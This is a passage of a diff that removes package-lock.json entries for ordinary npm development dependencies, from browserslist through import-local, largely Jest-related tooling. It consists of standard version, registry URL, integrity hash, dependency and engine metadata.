- "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=", - "dev": true - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-2.0.0.tgz", - "integrity": "sha512-bIomtDF5KGpdogkLd9VspvFzk9KfpyyGlS8YFVZl7TGPBHL5snIOnxeshwVgPteQ9b4Eydl+pVbIyE1DcvCWgQ==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/ci-info": { - "version": "3.7.1", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.7.1.tgz", - "integrity": "sha512-4jYS4MOAaCIStSRwiuxc4B8MYhIe676yO1sYGzARnjXkWpmzZMMYxY6zu8WYWDhSuth5zhrQ1rhNSibyyvv4/w==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dev": true, - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "dev": true - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dev": true, - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=", - "dev": true - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dev": true, - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", - "dev": true, - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "dev": true, - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "dependencies": { - "jake": "^10.8.5" - }, - "bin": { - "ejs": "bin/cli.js" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", - "dev": true - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": "^4.0.1", - "onetime": "^5.1.2", - "signal-exit": "^3.0.3", - "strip-final-newline": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sindresorhus/execa?sponsor=1" - } - }, - "node_modules/exit": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", - "dev": true, - "engines": { - "node": ">= 0.8.0" - } - }, - "node_modules/expect": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", - "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", - "dev": true, - "dependencies": { - "@jest/expect-utils": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "node_modules/extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha1-lpGEQOMEGnpBT4xS48V06zw+HgU=", - "dev": true, - "engines": [ - "node >=0.6.0" - ] - }, - "node_modules/fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", - "dev": true - }, - "node_modules/fast-json-stable-stringify": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", - "dev": true - }, - "node_modules/fb-watchman": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", - "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", - "dev": true, - "dependencies": { - "bser": "2.1.1" - } - }, - "node_modules/filelist": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", - "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", - "dev": true, - "dependencies": { - "minimatch": "^5.0.1" - } - }, - "node_modules/filelist/node_modules/brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0" - } - }, - "node_modules/filelist/node_modules/minimatch": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", - "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", - "dev": true, - "dependencies": { - "brace-expansion": "^2.0.1" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/fill-range": { - "version": "7.0.1", - "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz", - "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==", - "dev": true, - "dependencies": { - "to-regex-range": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "dependencies": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha1-+8cfDEGt6zf5bFd60e1C2P2sypE=", - "dev": true, - "engines": { - "node": "*" - } - }, - "node_modules/fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "dependencies": { - "minipass": "^3.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/fs.realpath": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha1-FQStJSMVjKpA20onh8sBQRmU6k8=", - "dev": true - }, - "node_modules/fsevents": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", - "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", - "dev": true, - "hasInstallScript": true, - "optional": true, - "os": [ - "darwin" - ], - "engines": { - "node": "^8.16.0 || ^10.6.0 || >=11.0.0" - } - }, - "node_modules/function-bind": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", - "dev": true, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/gensync": { - "version": "1.0.0-beta.2", - "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/get-caller-file": { - "version": "2.0.5", - "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", - "dev": true, - "engines": { - "node": "6.* || 8.* || >= 10.*" - } - }, - "node_modules/get-package-type": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", - "dev": true, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha1-Xv+OPmhNVprkyysSgmBOi6YhSfo=", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0" - } - }, - "node_modules/glob": { - "version": "7.1.7", - "resolved": "https://registry.npmjs.org/glob/-/glob-7.1.7.tgz", - "integrity": "sha512-OvD9ENzPLbegENnYP5UUfJIirTg4+XwMWGaQfQTY0JenxNvvIKP3U3/tAQSPIu/lHxXYSZmpXlUHeqAIdKzBLQ==", - "dev": true, - "dependencies": { - "fs.realpath": "^1.0.0", - "inflight": "^1.0.4", - "inherits": "2", - "minimatch": "^3.0.4", - "once": "^1.3.0", - "path-is-absolute": "^1.0.0" - }, - "engines": { - "node": "*" - }, - "funding": { - "url": "https://github.com/sponsors/isaacs" - } - }, - "node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/graceful-fs": { - "version": "4.2.10", - "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.10.tgz", - "integrity": "sha512-9ByhssR2fPVsNZj478qUUbKfmL0+t5BDVyjShtyZZLiK7ZDAArFFfopyOTj0M05wE2tJPisA4iTnnXl2YoPvOA==", - "dev": true - }, - "node_modules/har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha1-qUwiJOvKwEeCoNkDVSHyRzW37JI=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", - "deprecated": "this library is no longer supported", - "dev": true, - "dependencies": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/hasown": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", - "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, - "dependencies": { - "function-bind": "^1.1.2" - }, - "engines": { - "node": ">= 0.4" - } - }, - "node_modules/html-escaper": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", - "dev": true - }, - "node_modules/http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha1-muzZJRFHcvPZW2WmCruPfBj7rOE=", - "dev": true, - "dependencies": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - }, - "engines": { - "node": ">=0.8", - "npm": ">=1.3.7" - } - }, - "node_modules/human-signals": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==", - "dev": true, - "engines": { - "node": ">=10.17.0" - } - }, - "node_modules/import-local": { - "version": "3.2.0", - "resolved": 